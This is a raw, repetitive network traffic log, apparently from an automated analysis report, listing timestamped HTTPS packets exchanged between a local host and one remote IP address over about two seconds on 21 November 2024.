                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.405411959 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.405488968 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.405495882 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.405601978 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.409471989 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.409498930 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.409567118 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.409574032 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.409727097 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.412596941 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.412625074 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.412687063 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.412694931 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.412714005 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.412743092 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.543529034 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.543553114 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.543663979 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.543680906 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.543852091 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.583616972 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.583645105 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.583709955 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.583723068 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.583782911 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.586891890 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.586920023 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.586968899 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.586976051 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.587008953 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.587030888 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.590415955 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.590440035 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.590487003 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.590495110 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.590528011 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.590545893 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.593991041 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.594010115 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.594067097 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.594074011 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.594974041 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.597304106 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.597326040 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.597376108 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.597383022 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.597398996 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.597421885 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.601555109 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.601618052 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.601655960 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.601665020 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.601695061 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.601716042 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.604593039 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.604636908 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.604679108 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.604686975 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.604746103 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.604746103 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.735794067 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.735862970 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.735944033 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.735969067 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.736008883 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.736033916 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.775859118 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.775903940 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.776083946 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.776094913 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.776247025 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.778812885 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.778841019 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.778963089 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.778970957 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.779059887 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.782524109 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.782546997 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.782640934 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.782649040 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.782727003 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.786010027 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.786041975 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.786127090 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.786134005 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.786215067 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.789721012 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.789747000 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.789838076 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.789844990 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.789904118 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.793041945 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.793071985 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.793164968 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.793173075 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.793255091 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.796895981 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.796955109 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.797008038 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.797014952 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.797103882 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.937222958 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.937278032 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.937325001 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.937360048 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.937386036 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.937407970 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.968138933 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.968162060 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.968265057 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.968276024 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.968328953 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.971292973 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.971322060 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.971366882 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.971374989 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.971421003 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.975003958 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.975025892 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.975079060 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.975085974 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.975135088 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.978637934 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.978657961 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.978724003 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.978730917 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.978774071 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.982796907 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.982816935 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.982878923 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.982887983 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.982924938 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.984880924 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.984901905 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.984977007 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.984983921 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.985021114 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.988837957 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.988858938 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.988899946 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.988909006 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:29.988955021 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.129322052 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.129349947 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.129409075 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.129425049 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.129452944 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.129472017 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.159667015 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.159693956 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.159770012 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.159779072 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.159830093 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.162857056 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.162879944 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.162918091 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.162925005 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.162946939 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.162962914 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.165980101 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.166028023 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.166039944 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.166044950 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.166069031 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.166079044 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.169964075 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.169981956 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.170022011 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.170030117 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.170056105 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.170066118 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.173202038 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.173228025 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.173319101 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.173320055 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.173331976 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.173368931 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.177138090 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.177159071 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.177206039 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.177213907 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.177237988 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.177254915 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.180346012 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.180367947 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.180406094 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.180413961 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.180438042 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.180449009 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.343694925 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.343729019 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.343863964 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.343885899 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.343934059 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.351573944 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.351603031 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.351694107 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.351701975 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.351752996 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.354712009 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.354737043 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.354795933 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.354804039 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.354818106 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.354839087 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.358740091 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.358766079 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.358823061 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.358831882 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.358855963 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.358866930 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.361937046 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.361962080 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.362011909 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.362019062 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.362046003 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.362065077 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.365823030 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.365845919 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.365911007 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.365919113 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.365957975 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.369057894 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.369088888 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.369129896 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.369138002 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.369165897 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.369184971 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.372265100 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.372287035 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.372349024 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.372356892 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.372395039 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.783380032 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.783396959 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.783431053 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.783510923 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.783536911 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.783592939 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.783618927 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.783632994 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.783644915 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.783654928 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.783668041 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.783673048 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.783685923 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.783721924 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.783755064 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.783777952 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.783801079 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.783832073 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.783839941 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.783866882 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.783874035 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.783893108 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.783920050 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.783926010 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:30.783946037 CET49824443192.168.2.5188.165.52.14
